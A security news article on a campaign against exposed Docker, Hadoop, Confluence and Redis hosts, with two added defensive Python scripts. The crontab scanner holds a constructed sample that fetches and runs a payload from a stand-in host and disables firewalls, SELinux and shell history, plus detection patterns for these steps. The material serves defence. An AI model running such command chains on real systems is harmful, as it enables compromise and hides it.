Attack targets Docker, Hadoop, Confluence, and Redis with new payloads

A new attack campaign is targeting publicly accessible Docker, Hadoop, Confluence, and Redis deployments by exploiting common misconfigurations and known vulnerabilities. The attackers deploy previously unseen payloads including four binaries written in Golang.

“Once initial access is achieved, a series of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, spawn a reverse shell, and enable persistent access to the compromised hosts,” researchers from Cado Security said in a new report. While attribution cannot be made with certainty, the shell scripts observed in the campaign have some similarities to those used in the past by known threat actors TeamTNT and WatchDog.

Complex multi-stage infection chain via shell scripts

The infection chain of this campaign is quite complex, totaling over 10 shell scripts and various binaries, multiple persistence mechanisms, backup payload delivery methods, anti-forensics techniques, user mode rootkits, network scanning tools and exploits. Cado first observed the attack on one of its Docker honeypots, which was intentionally configured insecurely. The attackers connected to the Docker Engine API, spawned a new container based on Alpine Linux, and mounted the host’s root file system to a temporary directory inside the container.

This technique is not new and is commonly used in Docker attacks to write a malicious cron job on the host system that would then execute the attackers’ code. In this new campaign, the attackers wrote a file to the /usr/bin/vurl path and created a cron job to execute some base64-encoded shell commands.
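A defender-side check for the container technique described above, written here as an added example rather than code from Cado's report: it takes the JSON array that `docker inspect` prints for one or more containers and flags any container that bind-mounts the host root (or another sensitive host path) read-write into the container. The list of sensitive paths and the two sample container records are constructed for the example.

```python
import json

# Host paths that, when bind-mounted into a container, hand the container
# control over the host. "/" is the case described in the article; the rest
# are constructed additions for this example (cron directories and the
# Docker socket are common variations of the same idea).
SENSITIVE_HOST_PATHS = (
    "/",
    "/etc",
    "/root",
    "/var/run/docker.sock",
    "/var/spool/cron",
    "/etc/cron.d",
)


def _covers_sensitive_path(source):
    """True if the bind-mount source is, or is a parent of, a sensitive host path."""
    src = source.rstrip("/") or "/"
    if src == "/":
        return True
    return any(src == p or p.startswith(src + "/") for p in SENSITIVE_HOST_PATHS)


def find_host_escape_mounts(inspect_json):
    """Parse the output of `docker inspect <id>...` (a JSON array of container
    records) and return one finding per read-write bind mount of a sensitive
    host path. Only the Mounts/Config/HostConfig fields are consulted."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "").lstrip("/")
        for mount in container.get("Mounts", []):
            if mount.get("Type") != "bind":
                continue
            if _covers_sensitive_path(mount.get("Source", "")) and mount.get("RW", True):
                findings.append({
                    "container": name,
                    "image": container.get("Config", {}).get("Image"),
                    "source": mount.get("Source"),
                    "destination": mount.get("Destination"),
                    "privileged": container.get("HostConfig", {}).get("Privileged", False),
                })
    return findings


# Constructed sample: one ordinary web container and one Alpine container that
# mounts the host's root file system into /mnt, as in the observed attack.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "aaaa1111",
        "Name": "/web",
        "Config": {"Image": "nginx:1.25"},
        "HostConfig": {"Privileged": False, "Binds": ["/srv/www/html:/usr/share/nginx/html:ro"]},
        "Mounts": [{"Type": "bind", "Source": "/srv/www/html",
                    "Destination": "/usr/share/nginx/html", "RW": False}],
    },
    {
        "Id": "bbbb2222",
        "Name": "/suspicious_alpine",
        "Config": {"Image": "alpine"},
        "HostConfig": {"Privileged": False, "Binds": ["/:/mnt"]},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}],
    },
])


if __name__ == "__main__":
    for finding in find_host_escape_mounts(SAMPLE_INSPECT):
        print("host path exposed:", finding)
```

On a live host the same function can be fed `docker inspect $(docker ps -q)`; a finding for a container whose source is `/` and whose image is a bare `alpine` (or similar) is exactly the pattern Cado observed on its honeypot.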

The shell code executed by cron uses the vurl script to retrieve a first stage payload from a hardcoded command-and-control server via a TCP connection. If this method fails, a second cron job is created that uses Python and the urllib2 library to retrieve an alternative payload. The vurl payload is a shell script called whose goal is to make sure the chattr (change file attributes) utility is installed and to check if the current account is root. This will determine the next payload, yet another shell script called whose purpose is to prepare the system for the next stages of infection.

First, it uses the netstat command to check whether outbound connections to the internet on port 80 are allowed. It then disables the firewalld and iptables Linux firewalls, deletes the shell history to hide its tracks, disables SELinux protection, and adds public DNS servers to /etc/resolv.conf to ensure future C2 domains resolve correctly.
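A detection check covering the cron-based delivery and the system-preparation steps described above, added here as an example and not taken from Cado's report: it scans crontab text for entries that pipe a base64 blob into a decoder and a shell, decodes the blob, and reports which of the article's indicators (the vurl path, chattr, firewall and SELinux disabling, history wiping, resolv.conf edits) appear in the decoded command. The indicator names, regular expressions and the sample crontab lines are constructed for the example.

```python
import base64
import re

# Indicators drawn from the behaviour described in the article. The names and
# patterns are constructed for this example, not published detection content.
INDICATORS = {
    "vurl": r"/usr/bin/vurl|\bvurl\b",
    "chattr": r"\bchattr\b",
    "firewall_disable": r"systemctl\s+(stop|disable)\s+firewalld|iptables\s+-F",
    "selinux_disable": r"setenforce\s+0",
    "history_wipe": r"history\s+-c|\.bash_history",
    "resolv_conf": r"/etc/resolv\.conf",
}

# "echo <base64> | base64 -d" (or --decode); the blob must be at least 16 chars
# so that short legitimate echo statements are not matched.
BASE64_EXEC_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
)


def decode_cron_payload(line):
    """Return the decoded shell text embedded in an 'echo <b64> | base64 -d' cron
    entry, or None if the line carries no such payload or the blob is invalid."""
    match = BASE64_EXEC_RE.search(line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def scan_cron_line(line):
    """Describe one crontab line: decoded payload (if any) and matched indicators."""
    payload = decode_cron_payload(line)
    haystack = (payload or "") + "\n" + line
    hits = sorted(name for name, pattern in INDICATORS.items() if re.search(pattern, haystack))
    return {
        "line": line.strip(),
        "decoded": payload,
        "indicators": hits,
        "suspicious": payload is not None or bool(hits),
    }


def scan_crontab(text):
    """Scan a whole crontab and return only the entries worth an analyst's look."""
    results = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        result = scan_cron_line(line)
        if result["suspicious"]:
            results.append(result)
    return results


# Constructed sample payload mirroring the steps the article describes; it is
# base64-encoded at run time so the crontab line below matches the pattern.
_CONSTRUCTED_PAYLOAD = (
    "/usr/bin/vurl http://c2.example.invalid/stage1 | sh; "
    "setenforce 0; systemctl stop firewalld; iptables -F; "
    "history -c; echo 'nameserver 8.8.8.8' >> /etc/resolv.conf"
)

SAMPLE_CRONTAB = "\n".join([
    "# constructed sample crontab for this example",
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "* * * * * echo " + base64.b64encode(_CONSTRUCTED_PAYLOAD.encode()).decode() + " | base64 -d | bash",
])


if __name__ == "__main__":
    for entry in scan_crontab(SAMPLE_CRONTAB):
        print(entry["line"][:60] + "...")
        print("  decoded:   ", entry["decoded"])
        print("  indicators:", ", ".join(entry["indicators"]))
```

On a live system the same scanner can be pointed at `/etc/crontab`, the files under `/etc/cron.d`, and each user's crontab (`crontab -l -u <user>`); an entry that decodes to a command fetching and executing a remote payload, or that touches several of the listed indicators at once, matches the preparation stage described above.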
